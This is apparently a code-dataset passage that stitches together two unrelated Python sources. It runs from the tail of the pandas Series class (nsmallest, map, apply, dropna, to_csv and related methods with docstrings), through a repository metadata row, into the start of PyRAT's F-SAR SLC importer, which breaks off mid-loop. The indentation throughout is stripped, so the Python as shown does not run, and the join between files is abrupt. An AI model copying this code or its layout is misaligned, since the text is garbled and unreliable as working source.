When there are duplicate values that cannot all fit in a
Series of `n` elements:
- ``first`` : return the first `n` occurrences in order
of appearance.
- ``last`` : return the last `n` occurrences in reverse
order of appearance.
- ``all`` : keep all occurrences. This can result in a Series of
size larger than `n`.
Returns
-------
Series
The `n` smallest values in the Series, sorted in increasing order.
See Also
--------
Series.nlargest: Get the `n` largest elements.
Series.sort_values: Sort Series by values.
Series.head: Return the first `n` rows.
Notes
-----
Faster than ``.sort_values().head(n)`` for small `n` relative to
the size of the ``Series`` object.
Examples
--------
>>> countries_population = {"Italy": 59000000, "France": 65000000,
... "Brunei": 434000, "Malta": 434000,
... "Maldives": 434000, "Iceland": 337000,
... "Nauru": 11300, "Tuvalu": 11300,
... "Anguilla": 11300, "Monserat": 5200}
>>> s = pd.Series(countries_population)
>>> s
Italy 59000000
France 65000000
Brunei 434000
Malta 434000
Maldives 434000
Iceland 337000
Nauru 11300
Tuvalu 11300
Anguilla 11300
Monserat 5200
dtype: int64
The `n` smallest elements where ``n=5`` by default.
>>> s.nsmallest()
Monserat 5200
Nauru 11300
Tuvalu 11300
Anguilla 11300
Iceland 337000
dtype: int64
The `n` smallest elements where ``n=3``. Default `keep` value is
'first' so Nauru and Tuvalu will be kept.
>>> s.nsmallest(3)
Monserat 5200
Nauru 11300
Tuvalu 11300
dtype: int64
The `n` smallest elements where ``n=3`` and keeping the last
duplicates. Anguilla and Tuvalu will be kept since they are the last
with value 11300 based on the index order.
>>> s.nsmallest(3, keep='last')
Monserat 5200
Anguilla 11300
Tuvalu 11300
dtype: int64
The `n` smallest elements where ``n=3`` with all duplicates kept. Note
that the returned Series has four elements due to the three duplicates.
>>> s.nsmallest(3, keep='all')
Monserat 5200
Nauru 11300
Tuvalu 11300
Anguilla 11300
dtype: int64
"""
return algorithms.SelectNSeries(self, n=n, keep=keep).nsmallest()
def swaplevel(self, i=-2, j=-1, copy=True):
"""
Swap levels i and j in a MultiIndex.
Parameters
----------
i, j : int, str (can be mixed)
Level of index to be swapped. Can pass level name as string.
Returns
-------
Series
Series with levels swapped in MultiIndex.
.. versionchanged:: 0.18.1
The indexes ``i`` and ``j`` are now optional, and default to
the two innermost levels of the index.
"""
new_index = self.index.swaplevel(i, j)
return self._constructor(self._values, index=new_index, copy=copy).__finalize__(
self
)
def reorder_levels(self, order):
"""
Rearrange index levels using input order.
May not drop or duplicate levels.
Parameters
----------
order : list of int representing new level order
(reference level by number or key)
Returns
-------
type of caller (new object)
"""
if not isinstance(self.index, MultiIndex): # pragma: no cover
raise Exception("Can only reorder levels on a hierarchical axis.")
result = self.copy()
result.index = result.index.reorder_levels(order)
return result
def explode(self) -> "Series":
"""
Transform each element of a list-like to a row, replicating the
index values.
.. versionadded:: 0.25.0
Returns
-------
Series
Exploded lists to rows; index will be duplicated for these rows.
See Also
--------
Series.str.split : Split string values on specified separator.
Series.unstack : Unstack, a.k.a. pivot, Series with MultiIndex
to produce DataFrame.
DataFrame.melt : Unpivot a DataFrame from wide format to long format
DataFrame.explode : Explode a DataFrame from list-like
columns to long format.
Notes
-----
This routine will explode list-likes including lists, tuples,
Series, and np.ndarray. The result dtype of the subset rows will
be object. Scalars will be returned unchanged. Empty list-likes will
result in a np.nan for that row.
Examples
--------
>>> s = pd.Series([[1, 2, 3], 'foo', [], [3, 4]])
>>> s
0 [1, 2, 3]
1 foo
2 []
3 [3, 4]
dtype: object
>>> s.explode()
0 1
0 2
0 3
1 foo
2 NaN
3 3
3 4
dtype: object
"""
if not len(self) or not is_object_dtype(self):
return self.copy()
values, counts = reshape.explode(np.asarray(self.array))
result = Series(values, index=self.index.repeat(counts), name=self.name)
return result
def unstack(self, level=-1, fill_value=None):
"""
Unstack, a.k.a. pivot, Series with MultiIndex to produce DataFrame.
The level involved will automatically get sorted.
Parameters
----------
level : int, str, or list of these, default last level
Level(s) to unstack, can pass level name.
fill_value : scalar value, default None
Value to use when replacing NaN values.
.. versionadded:: 0.18.0
Returns
-------
DataFrame
Unstacked Series.
Examples
--------
>>> s = pd.Series([1, 2, 3, 4],
... index=pd.MultiIndex.from_product([['one', 'two'],
... ['a', 'b']]))
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
# ----------------------------------------------------------------------
# function application
def map(self, arg, na_action=None):
"""
Map values of Series according to input correspondence.
Used for substituting each value in a Series with another value,
that may be derived from a function, a ``dict`` or
a :class:`Series`.
Parameters
----------
arg : function, dict, or Series
Mapping correspondence.
na_action : {None, 'ignore'}, default None
If 'ignore', propagate NaN values, without passing them to the
mapping correspondence.
Returns
-------
Series
Same index as caller.
See Also
--------
Series.apply : For applying more complex functions on a Series.
DataFrame.apply : Apply a function row-/column-wise.
DataFrame.applymap : Apply a function elementwise on a whole DataFrame.
Notes
-----
When ``arg`` is a dictionary, values in Series that are not in the
dictionary (as keys) are converted to ``NaN``. However, if the
dictionary is a ``dict`` subclass that defines ``__missing__`` (i.e.
provides a method for default values), then this default is used
rather than ``NaN``.
Examples
--------
>>> s = pd.Series(['cat', 'dog', np.nan, 'rabbit'])
>>> s
0 cat
1 dog
2 NaN
3 rabbit
dtype: object
``map`` accepts a ``dict`` or a ``Series``. Values that are not found
in the ``dict`` are converted to ``NaN``, unless the dict has a default
value (e.g. ``defaultdict``):
>>> s.map({'cat': 'kitten', 'dog': 'puppy'})
0 kitten
1 puppy
2 NaN
3 NaN
dtype: object
It also accepts a function:
>>> s.map('I am a {}'.format)
0 I am a cat
1 I am a dog
2 I am a nan
3 I am a rabbit
dtype: object
To avoid applying the function to missing values (and keep them as
``NaN``) ``na_action='ignore'`` can be used:
>>> s.map('I am a {}'.format, na_action='ignore')
0 I am a cat
1 I am a dog
2 NaN
3 I am a rabbit
dtype: object
"""
new_values = super()._map_values(arg, na_action=na_action)
return self._constructor(new_values, index=self.index).__finalize__(self)
def _gotitem(self, key, ndim, subset=None):
"""
Sub-classes to define. Return a sliced object.
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
return self
_agg_see_also_doc = dedent(
"""
See Also
--------
Series.apply : Invoke function on a Series.
Series.transform : Transform function producing a Series with like indexes.
"""
)
_agg_examples_doc = dedent(
"""
Examples
--------
>>> s = pd.Series([1, 2, 3, 4])
>>> s
0 1
1 2
2 3
3 4
dtype: int64
>>> s.agg('min')
1
>>> s.agg(['min', 'max'])
min 1
max 4
dtype: int64
"""
)
@Substitution(
see_also=_agg_see_also_doc,
examples=_agg_examples_doc,
versionadded="\n.. versionadded:: 0.20.0\n",
**_shared_doc_kwargs
)
@Appender(generic._shared_docs["aggregate"])
def aggregate(self, func, axis=0, *args, **kwargs):
# Validate the axis parameter
self._get_axis_number(axis)
result, how = self._aggregate(func, *args, **kwargs)
if result is None:
# we can be called from an inner function which
# passes this meta-data
kwargs.pop("_axis", None)
kwargs.pop("_level", None)
# try a regular apply, this evaluates lambdas
# row-by-row; however if the lambda is expected a Series
# expression, e.g.: lambda x: x-x.quantile(0.25)
# this will fail, so we can try a vectorized evaluation
# we cannot FIRST try the vectorized evaluation, because
# then .agg and .apply would have different semantics if the
# operation is actually defined on the Series, e.g. str
try:
result = self.apply(func, *args, **kwargs)
except (ValueError, AttributeError, TypeError):
result = func(self, *args, **kwargs)
return result
agg = aggregate
@Appender(generic._shared_docs["transform"] % _shared_doc_kwargs)
def transform(self, func, axis=0, *args, **kwargs):
# Validate the axis parameter
self._get_axis_number(axis)
return super().transform(func, *args, **kwargs)
def apply(self, func, convert_dtype=True, args=(), **kwds):
"""
Invoke function on values of Series.
Can be ufunc (a NumPy function that applies to the entire Series)
or a Python function that only works on single values.
Parameters
----------
func : function
Python function or NumPy ufunc to apply.
convert_dtype : bool, default True
Try to find better dtype for elementwise function results. If
False, leave as dtype=object.
args : tuple
Positional arguments passed to func after the series value.
**kwds
Additional keyword arguments passed to func.
Returns
-------
Series or DataFrame
If func returns a Series object the result will be a DataFrame.
See Also
--------
Series.map: For element-wise operations.
Series.agg: Only perform aggregating type operations.
Series.transform: Only perform transforming type operations.
Examples
--------
Create a series with typical summer temperatures for each city.
>>> s = pd.Series([20, 21, 12],
... index=['London', 'New York', 'Helsinki'])
>>> s
London 20
New York 21
Helsinki 12
dtype: int64
Square the values by defining a function and passing it as an
argument to ``apply()``.
>>> def square(x):
... return x ** 2
>>> s.apply(square)
London 400
New York 441
Helsinki 144
dtype: int64
Square the values by passing an anonymous function as an
argument to ``apply()``.
>>> s.apply(lambda x: x ** 2)
London 400
New York 441
Helsinki 144
dtype: int64
Define a custom function that needs additional positional
arguments and pass these additional arguments using the
``args`` keyword.
>>> def subtract_custom_value(x, custom_value):
... return x - custom_value
>>> s.apply(subtract_custom_value, args=(5,))
London 15
New York 16
Helsinki 7
dtype: int64
Define a custom function that takes keyword arguments
and pass these arguments to ``apply``.
>>> def add_custom_values(x, **kwargs):
... for month in kwargs:
... x += kwargs[month]
... return x
>>> s.apply(add_custom_values, june=30, july=20, august=25)
London 95
New York 96
Helsinki 87
dtype: int64
Use a function from the Numpy library.
>>> s.apply(np.log)
London 2.995732
New York 3.044522
Helsinki 2.484907
dtype: float64
"""
if len(self) == 0:
return self._constructor(dtype=self.dtype, index=self.index).__finalize__(
self
)
# dispatch to agg
if isinstance(func, (list, dict)):
return self.aggregate(func, *args, **kwds)
# if we are a string, try to dispatch
if isinstance(func, str):
return self._try_aggregate_string_function(func, *args, **kwds)
# handle ufuncs and lambdas
if kwds or args and not isinstance(func, np.ufunc):
def f(x):
return func(x, *args, **kwds)
else:
f = func
with np.errstate(all="ignore"):
if isinstance(f, np.ufunc):
return f(self)
# row-wise access
if is_extension_type(self.dtype):
mapped = self._values.map(f)
else:
values = self.astype(object).values
mapped = lib.map_infer(values, f, convert=convert_dtype)
if len(mapped) and isinstance(mapped[0], Series):
# GH 25959 use pd.array instead of tolist
# so extension arrays can be used
return self._constructor_expanddim(pd.array(mapped), index=self.index)
else:
return self._constructor(mapped, index=self.index).__finalize__(self)
def _reduce(
self, op, name, axis=0, skipna=True, numeric_only=None, filter_type=None, **kwds
):
"""
Perform a reduction operation.
If we have an ndarray as a value, then simply perform the operation,
otherwise delegate to the object.
"""
delegate = self._values
if axis is not None:
self._get_axis_number(axis)
if isinstance(delegate, Categorical):
# TODO deprecate numeric_only argument for Categorical and use
# skipna as well, see GH25303
return delegate._reduce(name, numeric_only=numeric_only, **kwds)
elif isinstance(delegate, ExtensionArray):
# dispatch to ExtensionArray interface
return delegate._reduce(name, skipna=skipna, **kwds)
elif is_datetime64_dtype(delegate):
# use DatetimeIndex implementation to handle skipna correctly
delegate = DatetimeIndex(delegate)
elif is_timedelta64_dtype(delegate) and hasattr(TimedeltaIndex, name):
# use TimedeltaIndex to handle skipna correctly
# TODO: remove hasattr check after TimedeltaIndex has `std` method
delegate = TimedeltaIndex(delegate)
# dispatch to numpy arrays
elif isinstance(delegate, np.ndarray):
if numeric_only:
raise NotImplementedError(
"Series.{0} does not implement " "numeric_only.".format(name)
)
with np.errstate(all="ignore"):
return op(delegate, skipna=skipna, **kwds)
# TODO(EA) dispatch to Index
# remove once all internals extension types are
# moved to ExtensionArrays
return delegate._reduce(
op=op,
name=name,
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
filter_type=filter_type,
**kwds
)
def _reindex_indexer(self, new_index, indexer, copy):
if indexer is None:
if copy:
return self.copy()
return self
new_values = algorithms.take_1d(
self._values, indexer, allow_fill=True, fill_value=None
)
return self._constructor(new_values, index=new_index)
def _needs_reindex_multi(self, axes, method, level):
"""
Check if we do need a multi reindex; this is for compat with
higher dims.
"""
return False
@Appender(generic._shared_docs["align"] % _shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
):
return super().align(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis,
)
def rename(self, index=None, **kwargs):
"""
Alter Series index labels or name.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
Alternatively, change ``Series.name`` with a scalar value.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
index : scalar, hashable sequence, dict-like or function, optional
dict-like or functions are transformations to apply to
the index.
Scalar or hashable sequence-like will alter the ``Series.name``
attribute.
copy : bool, default True
Whether to copy underlying data.
inplace : bool, default False
Whether to return a new Series. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
Series
Series with index labels or name altered.
See Also
--------
Series.rename_axis : Set the name of the axis.
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
"""
kwargs["inplace"] = validate_bool_kwarg(kwargs.get("inplace", False), "inplace")
if callable(index) or is_dict_like(index):
return super().rename(index=index, **kwargs)
else:
return self._set_name(index, inplace=kwargs.get("inplace"))
@Substitution(**_shared_doc_kwargs)
@Appender(generic.NDFrame.reindex.__doc__)
def reindex(self, index=None, **kwargs):
return super().reindex(index=index, **kwargs)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace=False,
errors="raise",
):
"""
Return Series with specified index labels removed.
Remove elements of a Series based on specifying the index labels.
When using a multi-index, labels on different levels can be removed
by specifying the level.
Parameters
----------
labels : single label or list-like
Index labels to drop.
axis : 0, default 0
Redundant for application on Series.
index, columns : None
Redundant for application on Series, but index can be used instead
of labels.
.. versionadded:: 0.21.0
level : int or level name, optional
For MultiIndex, level for which the labels will be removed.
inplace : bool, default False
If True, do operation inplace and return None.
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and only existing labels are dropped.
Returns
-------
Series
Series with specified index labels removed.
Raises
------
KeyError
If none of the labels are found in the index.
See Also
--------
Series.reindex : Return only specified index labels of Series.
Series.dropna : Return series without null values.
Series.drop_duplicates : Return Series with duplicate values removed.
DataFrame.drop : Drop specified labels from rows or columns.
Examples
--------
>>> s = pd.Series(data=np.arange(3), index=['A', 'B', 'C'])
>>> s
A 0
B 1
C 2
dtype: int64
Drop labels B en C
>>> s.drop(labels=['B', 'C'])
A 0
dtype: int64
Drop 2nd level label in MultiIndex Series
>>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
... ['speed', 'weight', 'length']],
... codes=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
... [0, 1, 2, 0, 1, 2, 0, 1, 2]])
>>> s = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3],
... index=midx)
>>> s
lama speed 45.0
weight 200.0
length 1.2
cow speed 30.0
weight 250.0
length 1.5
falcon speed 320.0
weight 1.0
length 0.3
dtype: float64
>>> s.drop(labels='weight', level=1)
lama speed 45.0
length 1.2
cow speed 30.0
length 1.5
falcon speed 320.0
length 0.3
dtype: float64
"""
return super().drop(
labels=labels,
axis=axis,
index=index,
columns=columns,
level=level,
inplace=inplace,
errors=errors,
)
@Substitution(**_shared_doc_kwargs)
@Appender(generic.NDFrame.fillna.__doc__)
def fillna(
self,
value=None,
method=None,
axis=None,
inplace=False,
limit=None,
downcast=None,
**kwargs
):
return super().fillna(
value=value,
method=method,
axis=axis,
inplace=inplace,
limit=limit,
downcast=downcast,
**kwargs
)
@Appender(generic._shared_docs["replace"] % _shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
return super().replace(
to_replace=to_replace,
value=value,
inplace=inplace,
limit=limit,
regex=regex,
method=method,
)
@Appender(generic._shared_docs["shift"] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0, fill_value=None):
return super().shift(
periods=periods, freq=freq, axis=axis, fill_value=fill_value
)
def memory_usage(self, index=True, deep=False):
"""
Return the memory usage of the Series.
The memory usage can optionally include the contribution of
the index and of elements of `object` dtype.
Parameters
----------
index : bool, default True
Specifies whether to include the memory usage of the Series index.
deep : bool, default False
If True, introspect the data deeply by interrogating
`object` dtypes for system-level memory consumption, and include
it in the returned value.
Returns
-------
int
Bytes of memory consumed.
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
DataFrame.memory_usage : Bytes consumed by a DataFrame.
Examples
--------
>>> s = pd.Series(range(3))
>>> s.memory_usage()
152
Not including the index gives the size of the rest of the data, which
is necessarily smaller:
>>> s.memory_usage(index=False)
24
The memory footprint of `object` values is ignored by default:
>>> s = pd.Series(["a", "b"])
>>> s.values
array(['a', 'b'], dtype=object)
>>> s.memory_usage()
144
>>> s.memory_usage(deep=True)
260
"""
v = super().memory_usage(deep=deep)
if index:
v += self.index.memory_usage(deep=deep)
return v
@Appender(generic.NDFrame.take.__doc__)
def take(self, indices, axis=0, is_copy=False, **kwargs):
nv.validate_take(tuple(), kwargs)
indices = ensure_platform_int(indices)
new_index = self.index.take(indices)
if is_categorical_dtype(self):
# https://github.com/pandas-dev/pandas/issues/20664
# TODO: remove when the default Categorical.take behavior changes
indices = maybe_convert_indices(indices, len(self._get_axis(axis)))
kwargs = {"allow_fill": False}
else:
kwargs = {}
new_values = self._values.take(indices, **kwargs)
result = self._constructor(
new_values, index=new_index, fastpath=True
).__finalize__(self)
# Maybe set copy if we didn't actually change the index.
if is_copy:
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
def isin(self, values):
"""
Check whether `values` are contained in Series.
Return a boolean Series showing whether each element in the Series
matches an element in the passed sequence of `values` exactly.
Parameters
----------
values : set or list-like
The sequence of values to test. Passing in a single string will
raise a ``TypeError``. Instead, turn a single string into a
list of one element.
.. versionadded:: 0.18.1
Support for values as a set.
Returns
-------
Series
Series of booleans indicating if each element is in values.
Raises
------
TypeError
* If `values` is a string
See Also
--------
DataFrame.isin : Equivalent method on DataFrame.
Examples
--------
>>> s = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama',
... 'hippo'], name='animal')
>>> s.isin(['cow', 'lama'])
0 True
1 True
2 True
3 False
4 True
5 False
Name: animal, dtype: bool
Passing a single string as ``s.isin('lama')`` will raise an error. Use
a list of one element instead:
>>> s.isin(['lama'])
0 True
1 False
2 True
3 False
4 True
5 False
Name: animal, dtype: bool
"""
result = algorithms.isin(self, values)
return self._constructor(result, index=self.index).__finalize__(self)
def between(self, left, right, inclusive=True):
"""
Return boolean Series equivalent to left <= series <= right.
This function returns a boolean vector containing `True` wherever the
corresponding Series element is between the boundary values `left` and
`right`. NA values are treated as `False`.
Parameters
----------
left : scalar
Left boundary.
right : scalar
Right boundary.
inclusive : bool, default True
Include boundaries.
Returns
-------
Series
Series representing whether each element is between left and
right (inclusive).
See Also
--------
Series.gt : Greater than of series and other.
Series.lt : Less than of series and other.
Notes
-----
This function is equivalent to ``(left <= ser) & (ser <= right)``
Examples
--------
>>> s = pd.Series([2, 0, 4, 8, np.nan])
Boundary values are included by default:
>>> s.between(1, 4)
0 True
1 False
2 True
3 False
4 False
dtype: bool
With `inclusive` set to ``False`` boundary values are excluded:
>>> s.between(1, 4, inclusive=False)
0 True
1 False
2 False
3 False
4 False
dtype: bool
`left` and `right` can be any scalar value:
>>> s = pd.Series(['Alice', 'Bob', 'Carol', 'Eve'])
>>> s.between('Anna', 'Daniel')
0 False
1 True
2 True
3 False
dtype: bool
"""
if inclusive:
lmask = self >= left
rmask = self <= right
else:
lmask = self > left
rmask = self < right
return lmask & rmask
@Appender(generic.NDFrame.to_csv.__doc__)
def to_csv(self, *args, **kwargs):
names = [
"path_or_buf",
"sep",
"na_rep",
"float_format",
"columns",
"header",
"index",
"index_label",
"mode",
"encoding",
"compression",
"quoting",
"quotechar",
"line_terminator",
"chunksize",
"date_format",
"doublequote",
"escapechar",
"decimal",
]
old_names = [
"path_or_buf",
"index",
"sep",
"na_rep",
"float_format",
"header",
"index_label",
"mode",
"encoding",
"compression",
"date_format",
"decimal",
]
if "path" in kwargs:
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`, and argument "
"'path' will be renamed to 'path_or_buf'.",
FutureWarning,
stacklevel=2,
)
kwargs["path_or_buf"] = kwargs.pop("path")
if len(args) > 1:
# Either "index" (old signature) or "sep" (new signature) is being
# passed as second argument (while the first is the same)
maybe_sep = args[1]
if not (is_string_like(maybe_sep) and len(maybe_sep) == 1):
# old signature
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`. Note that the "
"order of arguments changed, and the new one "
"has 'sep' in first place, for which \"{}\" is "
"not a valid value. The old order will cease to "
"be supported in a future version. Please refer "
"to the documentation for `DataFrame.to_csv` "
"when updating your function "
"calls.".format(maybe_sep),
FutureWarning,
stacklevel=2,
)
names = old_names
pos_args = dict(zip(names[: len(args)], args))
for key in pos_args:
if key in kwargs:
raise ValueError(
"Argument given by name ('{}') and position "
"({})".format(key, names.index(key))
)
kwargs[key] = pos_args[key]
if kwargs.get("header", None) is None:
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`, and argument "
"'header' will change its default value from False "
"to True: please pass an explicit value to suppress "
"this warning.",
FutureWarning,
stacklevel=2,
)
kwargs["header"] = False # Backwards compatibility.
return self.to_frame().to_csv(**kwargs)
@Appender(generic._shared_docs["isna"] % _shared_doc_kwargs)
def isna(self):
return super().isna()
@Appender(generic._shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self):
return super().isnull()
@Appender(generic._shared_docs["notna"] % _shared_doc_kwargs)
def notna(self):
return super().notna()
@Appender(generic._shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self):
return super().notnull()
def dropna(self, axis=0, inplace=False, **kwargs):
"""
Return a new Series with missing values removed.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index'}, default 0
There is only one axis to drop values from.
inplace : bool, default False
If True, do operation inplace and return None.
**kwargs
Not in use.
Returns
-------
Series
Series with NA entries dropped from it.
See Also
--------
Series.isna: Indicate missing values.
Series.notna : Indicate existing (non-missing) values.
Series.fillna : Replace missing values.
DataFrame.dropna : Drop rows or columns which contain NA values.
Index.dropna : Drop missing indices.
Examples
--------
>>> ser = pd.Series([1., 2., np.nan])
>>> ser
0 1.0
1 2.0
2 NaN
dtype: float64
Drop NA values from a Series.
>>> ser.dropna()
0 1.0
1 2.0
dtype: float64
Keep the Series with valid entries in the same variable.
>>> ser.dropna(inplace=True)
>>> ser
0 1.0
1 2.0
dtype: float64
Empty strings are not considered NA values. ``None`` is considered an
NA value.
>>> ser = pd.Series([np.NaN, 2, pd.NaT, '', None, 'I stay'])
>>> ser
0 NaN
1 2
2 NaT
3
4 None
5 I stay
dtype: object
>>> ser.dropna()
1 2
3
5 I stay
dtype: object
"""
inplace = validate_bool_kwarg(inplace, "inplace")
kwargs.pop("how", None)
if kwargs:
raise TypeError(
"dropna() got an unexpected keyword "
'argument "{0}"'.format(list(kwargs.keys())[0])
)
# Validate the axis parameter
self._get_axis_number(axis or 0)
if self._can_hold_na:
result = remove_na_arraylike(self)
if inplace:
self._update_inplace(result)
else:
return result
else:
if inplace:
# do nothing
pass
else:
return self.copy()
def valid(self, inplace=False, **kwargs):
"""
Return Series without null values.
.. deprecated:: 0.23.0
Use :meth:`Series.dropna` instead.
Returns
-------
Series
Series without null values.
"""
warnings.warn(
"Method .valid will be removed in a future version. "
"Use .dropna instead.",
FutureWarning,
stacklevel=2,
)
return self.dropna(inplace=inplace, **kwargs)
# ----------------------------------------------------------------------
# Time series-oriented methods
def to_timestamp(self, freq=None, how="start", copy=True):
"""
Cast to DatetimeIndex of Timestamps, at *beginning* of period.
Parameters
----------
freq : str, default frequency of PeriodIndex
Desired frequency.
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end.
copy : bool, default True
Whether or not to return a copy.
Returns
-------
Series with DatetimeIndex
"""
new_values = self._values
if copy:
new_values = new_values.copy()
new_index = self.index.to_timestamp(freq=freq, how=how)
return self._constructor(new_values, index=new_index).__finalize__(self)
def to_period(self, freq=None, copy=True):
"""
Convert Series from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed).
Parameters
----------
freq : str, default None
Frequency associated with the PeriodIndex.
copy : bool, default True
Whether or not to return a copy.
Returns
-------
Series
Series with index converted to PeriodIndex.
"""
new_values = self._values
if copy:
new_values = new_values.copy()
new_index = self.index.to_period(freq=freq)
return self._constructor(new_values, index=new_index).__finalize__(self)
# ----------------------------------------------------------------------
# Accessor Methods
# ----------------------------------------------------------------------
str = CachedAccessor("str", StringMethods)
dt = CachedAccessor("dt", CombinedDatetimelikeProperties)
cat = CachedAccessor("cat", CategoricalAccessor)
plot = CachedAccessor("plot", pandas.plotting.PlotAccessor)
sparse = CachedAccessor("sparse", SparseAccessor)
# ----------------------------------------------------------------------
# Add plotting methods to Series
hist = pandas.plotting.hist_series
Series._setup_axes(
["index"],
info_axis=0,
stat_axis=0,
aliases={"rows": 0},
docs={"index": "The index (axis labels) of the Series."},
)
Series._add_numeric_operations()
Series._add_series_only_operations()
Series._add_series_or_dataframe_operations()
# Add arithmetic!
ops.add_flex_arithmetic_methods(Series)
ops.add_special_arithmetic_methods(Series)
| apache-2.0 | -3,893,275,183,218,865,000 | 29.795547 | 88 | 0.51797 | false |
birgander2/PyRAT | pyrat/load/FSAR.py | 1 | 29089 | import pyrat
import glob, os
import logging
import copy
import numpy as np
from PyQt5 import QtCore, QtWidgets
# from pyrat.load import RatFile
from pyrat.lib.ste import RatFile, Xml2Py
from pyrat.viewer.Dialogs import FlexFilesel
from pyrat.viewer.Widgets import HLine, CropBoxWidget, BoolWidget, FileselWidget, ProductContentWidget
class FSAR(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product. This class loads the SLC data of one or several bands and / or one
or several polarisations, together with their meta data into a new PyRAT layer(s).
:param dir: The F-SAR product directory.
:type dir: str
:param bands: Load only this band. '*' to load all bands. Default='*'
:type band: string
:param polarisations: Load only this polarisation. '*' to load all bands. Default='*'
:type polarisation: string
:param product: Selects the product component to import. Default='RGI-SLC'
:type product: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:param sym: PolSAR symmetrisation. If set, HV and VH are averaged on import. Default=False
:type sym: bool
:author: Andreas Reigber
"""
gui = {'menu': 'File|Import airborne', 'entry': 'F-SAR'}
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'suffix', 'value': ''},
{'var': 'crop', 'value': [0, 0, 0, 0]},
{'var': 'sym', 'value': False, 'type': 'bool', 'text': 'Cross-polar symmetrisation'},
{'var': 'mask', 'type': bool, 'value': False}]
def __init__(self, *args, **kwargs):
super(FSAR, self).__init__(*args, **kwargs)
self.name = "FSAR SLC IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
if self.product == 'RGI-SLC':
head = 'slc'
src = ('RGI', 'RGI-SR')
if self.product == 'RGI-AMP':
head = 'amp'
src = ('RGI', 'RGI-SR')
if self.product == 'INF-SLC':
head = 'slc_coreg_offset'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
if self.product == 'INF-CIR':
head = 'slcpol'
src = ('INF', 'INF-SR')
if self.polarisations == '*':
self.polarisations = '??'
if self.product == 'INF-CIR':
files = glob.glob(os.path.join(self.dir, src[0], src[1],
head + '*' + self.bands.upper() + self.polarisations.lower() + '*_c' + str(
self.track) + '_s' + str(self.subaperture) + '_*coreg.rat'))
else:
files = glob.glob(os.path.join(self.dir, src[0], src[1],
head + '*' + self.bands.upper() + self.polarisations.lower() + '_*.rat'))
if self.product == 'INF-SLC':
if len(files) is 0:
head = 'slc_coreg'
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper()
+ self.polarisations.lower() + '_*.rat'))
bands = list(set([os.path.basename(slc).split('_')[-2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[-2][1:3] for slc in files]))
if self.product != 'INF-SLC':
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
if self.mask is True:
maskfile = glob.glob(os.path.join(self.dir, src[0], src[1], 'mask*' + band.upper() + '*.rat'))
msk = RatFile(maskfile[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0 or block[1] > naz:
block[1] = naz
if block[3] == 0 or block[3] > nrg:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='complex64')
bmeta = {}
bmeta['sensor'] = 'DLR F-SAR'
bmeta['band'] = band
bmeta['CH_pol'] = [' '] * len(bandfiles)
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
if self.mask is True:
mask = msk.read(block=block)
